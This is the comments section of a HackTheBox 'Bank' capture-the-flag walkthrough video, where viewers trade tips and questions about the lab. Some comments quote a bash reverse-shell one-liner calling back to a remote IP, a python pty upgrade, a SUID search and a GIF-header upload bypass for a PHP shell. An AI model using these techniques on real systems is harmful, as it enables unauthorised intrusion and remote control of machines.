HackTheBox - Bank

Поділитися
Вставка
  • Опубліковано 2 гру 2024

КОМЕНТАРІ • 90

  • @anonymous6666
    @anonymous6666 3 роки тому +5

    you taught me how to cancel redirects, thanks. super helpful!

  • @jchristie6632
    @jchristie6632 4 роки тому +11

    Quick tip: On the balance-transfer page if you click where it says "size" it arranges the files from smallest to largest so you don't need to wget them.

    • @huntit4578
      @huntit4578 Рік тому +1

      Woah why didnt i think of that

  • @j4ck_d4niels
    @j4ck_d4niels 4 роки тому +2

    Nice Video Ippsec always fantastic Tutorial, JUST a note I clicked the Size on 13:59 and it shows 257kb file it saves a little time :)

  • @leandroesteves9381
    @leandroesteves9381 7 років тому +8

    Thank you Ippsec for this Walkthrough. I've learned some new tricks!

  • @muhammadawaiskhan1775
    @muhammadawaiskhan1775 4 роки тому +2

    Sir this is Awais khan from PAKISTAN
    Lots of love from Pakistan
    Please make a video series on websites hacking and hacking methodologies .
    We will be really thankful to you ❤️

  • @convalescence1986
    @convalescence1986 7 років тому +1

    Thanks for showing the privesc, didn't manage to get that one before it was retired :)

  • @joshuafaust6367
    @joshuafaust6367 7 років тому +3

    Great stuff. Learned a bunch. Definetly using that python command on NC shells! Did not know that!

  • @evstefan6686
    @evstefan6686 7 років тому +2

    Great work IPPSEC thanks for sharing

  • @georgesbolssens1110
    @georgesbolssens1110 7 років тому +1

    At 5:20, why didn't you just CTR+F the source for timestamp[column delimiter]2 ?

  • @georgeo1316
    @georgeo1316 6 років тому +23

    15:00 could’ve just sorted it by file size in the webpage 💔

  • @rishabhshrivastava1870
    @rishabhshrivastava1870 4 роки тому +1

    Where can i learn all these commands?I have been studying shell script but i still don't know, how to write this commands.?

  • @kewalsharma5953
    @kewalsharma5953 3 роки тому

    thanks for helping me out in solving my 15th box

  • @illusioniser
    @illusioniser 4 роки тому

    Anyone else having trouble with the initial command injection at 21:30? None of the commands I run see to work, I just see GIF89a on the screen and nothing else.

  • @bryanmacario4755
    @bryanmacario4755 4 роки тому +2

    thanks for the walkthrough. I got stuck at the part where you spawn a TTY shell. I followed all the commands you did, and i was not able to scroll up and down within the shell to view command history. I tried shift + pg-up/down, ctrl + shift + pg-up/down. Still couldn't get it to work. Please let me know what i'm doing wrong. I'm using the default kali linux terminal.

    • @happyharry2145
      @happyharry2145 4 роки тому

      u should do the python -c 'import pty;pty.spawn('/bin/bash')'...... this will give u arrow functions on the shell

  • @medhasni6432
    @medhasni6432 3 роки тому

    31:22 would that work on the other files if root owns em??

  • @wyyder1191
    @wyyder1191 5 років тому +2

    Namp result second line has the bank.htb(10.10.10.29) Guessing not required.

  • @suhass92
    @suhass92 5 років тому

    Hey Ipp
    What did you filter out from the dirbuster wordlist to create the bank one?

  • @TheHopeless72
    @TheHopeless72 2 роки тому

    Dude these are so cool

  • @TheHackTodayOfficial
    @TheHackTodayOfficial 7 років тому +50

    Where did you learn all this? you are skilled bro! none of the courses teach you that much stuff which you're sharing with us!

    • @7Shol
      @7Shol 4 роки тому +16

      This guy must have worked for CIA

    • @moviesentertainment9623
      @moviesentertainment9623 4 роки тому +3

      @@7Shol I'm from FBI

    • @HK-sw3vi
      @HK-sw3vi 3 роки тому +4

      @@moviesentertainment9623 yea? and my dad is Brad Pitt

    • @jesusdacoast872
      @jesusdacoast872 3 роки тому +2

      Quite right bro, we all wondering about that , 🤨 maybe he's the maker of hackthebox Hahahhhh

    • @deathbynecro7813
      @deathbynecro7813 3 роки тому +3

      After a long time of doing such you will learn. Takes practise and time

  • @archangelos7426
    @archangelos7426 5 років тому

    Hey IppSec,
    Could you please demonstrate the Luke Box too ?
    Thanks in advance.

  • @Jake-km7wp
    @Jake-km7wp 4 роки тому

    Great video, thank you.

  • @j93040921
    @j93040921 4 роки тому

    30:30 could you please explain more about this command? find / -perm -4000 2>/dev/null

    • @j93040921
      @j93040921 4 роки тому

      -perm -4000: permission setid; 2>/dev/null: throw away error msg

  • @kimth0312
    @kimth0312 4 роки тому

    Why can't we use 'bash -i >& /dev/tcp/10.0.0.0/8080 0>&1' in this case? I've tried some of reverse shell but failed

  • @alexanderrossman5895
    @alexanderrossman5895 6 років тому

    Hi Ippsec, thank you so much for your video.
    I have a question - Do we needed import PTY or it's just for comfortable future work ?

    • @happyharry2145
      @happyharry2145 4 роки тому +1

      he does those things to get arrow functions and auto complete on the shell

  • @dax97
    @dax97 7 років тому +4

    Great Work Man

  • @neoXXquick
    @neoXXquick 7 років тому +2

    thx for sharing.. great work...

  • @MikeUGA2
    @MikeUGA2 4 роки тому

    Thank you so much.

  • @yurilsaps
    @yurilsaps Рік тому

    Your job is so amazing, do you have some video of how do you navigate through the bash windows?

    • @rami4933
      @rami4933 Місяць тому +1

      yes, the tool is called tmux and he made a video about it

  • @sksunil3972
    @sksunil3972 4 роки тому

    The whole video is great but the last part I didn't understood how it is possible to change the password of a root user in passwd I mean password hashes are stored in shadow and accessed by OS for password verification if I'm not wrong and passwd file are used for operations like command 'ls', 'cat'... Etc to verify if user is in valid group to list a directory or read a file so my question is how u can change password with passwd file??????

  • @umeshfarrow
    @umeshfarrow 5 років тому

    Which desktop environment are you using and how to get terminal which you are using?

    • @happyharry2145
      @happyharry2145 4 роки тому

      he's using temux for terminal and he has a video about it

  • @taiquangong9912
    @taiquangong9912 5 років тому

    I had a hard time getting the login code for hack the box. Any assist?

  • @Haxr-dq6wt
    @Haxr-dq6wt 4 роки тому

    I didn't understand this step, and we have to do it (the DNS enumeration)
    Shall I do this every time I get Apache default page as the main page??
    why you didn't try to Gobuster it or something like that?
    can you explain this step for me please, I lost here

    • @CAP0VELLI
      @CAP0VELLI 4 роки тому +1

      The DNS enumeration is because port 53 was open. This is where you can do zone tranfers etc.. As there was nothing more which could be done on that port , move on to the next.

  • @justaguy3158
    @justaguy3158 7 років тому +1

    Thanks man.. you are the best :)

  • @Andree23com
    @Andree23com 5 років тому

    the best new trick method

  • @0xx039
    @0xx039 4 роки тому

    Changing 302 to 200 does this works because of VirtualHost ?

    • @happyharry2145
      @happyharry2145 4 роки тому

      no, he just did that so the browser doesn't automatically redirect him to login.php and he can stay on the page he was on ..... whenever a browser sees 302 it redirects to the link specified by the "location" response header

  • @NecroKennny
    @NecroKennny 4 роки тому

    everything was going great until the corners.gif part. Is that just a text file with gif8 in it? is it a shell?

    • @happyharry2145
      @happyharry2145 4 роки тому

      he sent an upload of a normal gif then intercepted the request that was going in burpsuite so he can modify it , then he kept the gif8 part so the server won't block that file and would think it was a valid gif when actually it was a php script to give him code execution on the server

  • @L33TTechReviewer
    @L33TTechReviewer 4 роки тому

    thanks for the video! I did it myself first and didn't know a few things such as how handy the match and replace in burp could be for this purpose as well as the other methods to get in. I blindly did php-reverseshell into sudo -l and then checking for suids and then elevating. Should've done more post-exploitation enumeration to catch the other things you found. Could've also created another user with od 0 in /etc/passwd having write access right? As always fantastic vids, keep it up!

  • @mimikatz
    @mimikatz 6 років тому

    Can anyone give me an idea why

    • @ippsec
      @ippsec  6 років тому +2

      Read up on php system(), or executing shell commands with php. I believe that is the command prompt you are expecting

    • @mimikatz
      @mimikatz 6 років тому

      Hello, thanks for the reply! So I should have said I understood the theory of executing shell commands with PHP, all except the usage of "echo". Most places I was read didn't have echo in the PHP, just

    • @ippsec
      @ippsec  6 років тому +4

      Yep, the echo was just a mistake. There are like 3-4 different commands that allow PHP to execute shell commands, one of them does not automatically print to STDOUT so echo is needed. System by default prints to stdout in PHP, so the echo there makes it print the result twice.

    • @mimikatz
      @mimikatz 6 років тому

      Thanks again

  • @linuxbegginer361
    @linuxbegginer361 6 років тому

    amazing video

  • @thisrandomguy633
    @thisrandomguy633 7 років тому

    Hey man, now I know you cannot give me the answer but I’ve been stuck on the devel box for a while now. Anyways I have no issue getting a meterpreter, my issue is then trying to escalate privs so I can get the flag. Any helpful hints you could share with me?

    • @ippsec
      @ippsec  7 років тому

      You may pick up a trick or two watching my Arctic or Bastard video.

    • @thisrandomguy633
      @thisrandomguy633 7 років тому

      IppSec ah thank you! Il get to watching those now :) appreciate the help!

  • @hamdisaidani3231
    @hamdisaidani3231 7 років тому

    Great job men

  • @1kkarol
    @1kkarol 3 роки тому

    Greetings from CS-GO

  • @MartinMllerSkarbiniksPedersen
    @MartinMllerSkarbiniksPedersen 3 роки тому

    chris. is an email address not a dns name

  • @angryoldcanadian3905
    @angryoldcanadian3905 5 років тому

    as usual, whenever I try to use burpsuite, nothing happens and I get zero information

    • @outzie6182
      @outzie6182 5 років тому

      have you set your proxy correctly in your browser?

  • @d3ds3csec4
    @d3ds3csec4 4 роки тому

    Cool realy

  • @sakyb7
    @sakyb7 6 років тому +1

    Where is the flag????

    • @ippsec
      @ippsec  6 років тому +3

      /root/root.txt -- I try not to show flags so you can't just type them in without doing the box.

    • @sakyb7
      @sakyb7 6 років тому

      IppSec yup! Thanks... this was really helpfull

  • @dxsp1d3r
    @dxsp1d3r 5 років тому +4

    30:50 ippsec got hacked haha

  • @punjabivideocreator8636
    @punjabivideocreator8636 5 років тому +3

    How many Indian's are here.... Give attendance 👍👍👍👍